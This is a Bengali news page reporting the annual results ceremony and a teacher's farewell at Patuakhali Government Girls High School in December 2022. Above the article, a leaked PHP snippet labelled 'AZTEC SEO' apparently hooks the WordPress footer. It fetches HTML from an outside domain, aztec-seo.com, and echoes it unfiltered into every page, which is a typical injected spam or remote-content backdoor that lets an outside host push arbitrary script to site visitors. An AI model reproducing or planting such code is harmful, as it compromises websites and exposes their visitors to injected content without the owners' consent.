/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); পটুয়াখালী সরকারি গার্লস হাইস্কুলের বাৎসরিক ফলাফল প্রদান | Dhaka Sky News

‘শেখ হাসিনাকে উৎখাতে বাম-ডান সবাই উঠে পড়ে লেগেছে‌’

আগের সংবাদ

পটুয়াখালী প্রেসক্লাবের বার্ষিক সাধারণ সভা ও দায়িত্ব হস্তান্তর

পরের সংবাদ

পটুয়াখালী সরকারি গার্লস হাইস্কুলের বাৎসরিক ফলাফল প্রদান

আলতাফ হোসেন জাকির

প্রকাশিত: December 31, 2022 , 5:44 pm

পটুয়াখালী সরকারি গার্লস হাইস্কুলে বাৎসরিক ফলাফল প্রদান অনুষ্ঠিত হয়।
আজ ৩১ ডিসেম্বর শনিবার সকালে স্কুলের এ অনুষ্ঠান অনুষ্ঠিত হয়। অনুষ্ঠানে হাইস্কুলের প্রধান শিক্ষক রফিকুল ইসলামের সভাপতিত্বে স্কুলের শিক্ষক-অভিভাবক, ছাত্রছাত্রী ও কর্মচারীবৃন্দ উপস্থিত ছিলেন।
সভাপতির বক্তব্যে প্রধান শিক্ষক রফিকুল ইসলাম বলেন, পটুয়াখালী জেলার সেরা স্কুল হলো গার্লস সরকারি হাইস্কুল। শিক্ষকদের অক্লান্ত পরিশ্রমের ফলে স্কুলের শিক্ষার মান দিন দিন বৃদ্ধি পাচ্ছে। আমরা চাচ্ছি, শিক্ষকদের সবাইকে নিয়ে অন্যান্য শিক্ষা প্রতিষ্ঠানের মতো দেশের অন্যতম স্কুলে পরিণত করতে। আশা করি এতে পটুয়াখালী সরকারি গার্লস হাইস্কুলের নাম চারদিকে ছড়িয়ে পড়বে। করোনাকালীন শিক্ষার্থীরা একটু পিছিয়ে পড়লেও আমরা তা কাটিয়ে ওঠার যথেষ্ট চেষ্টা করেছি এবং সামনের দিনগুলোতে তা আরও কার্যকর হবে বলে আমার বিশ্বাস। স্কুলের শিক্ষার পরিবেশ অন্যান্য স্কুলের চেয়ে অনেক ভালো বলেও তিনি মন্তব্য করেন।
অনুষ্ঠানে আরও উপস্থিত ছিলেন-সহকারী প্রধান শিক্ষক (দায়িত্বপ্রাপ্ত) মৃণাল কৃন্তি বড়াল, সহকারী প্রধান শিক্ষক পবিত্র কুমার দাস, শিক্ষক হুমায়ুন কবির, শিক্ষক হাবিবুর রহমান, শিক্ষিকা রীমা আক্তার, শিক্ষিকা মুর্শিদা রায়হান, সিনিয়র শিক্ষক রোকেয়া বেগম। সিনিয়র শিক্ষক রোকেয়া বেগমের আজ স্কুল থেকে বিদায়ের দিন। তিনি তার আবেগাপ্লুত বক্তব্যে শিক্ষার্থীদের ধর্মীয় রীতিনীতি মেনে চলার আহ্বান জানিয়েছেন।
উল্লেখ যে, আগামীকাল রোববার বছরের প্রথম দিন পটুয়াখালী জেলা প্রশাসক, বিদ্যালয়ের প্রধান শিক্ষক, শিক্ষকগণ স্কুলের শিক্ষার্থীর মধ্যে বই বিতরণ কার্যক্রম শুরু করবে বলে অনুষ্ঠান থেকে ঘোষণা দেওয়া হয়।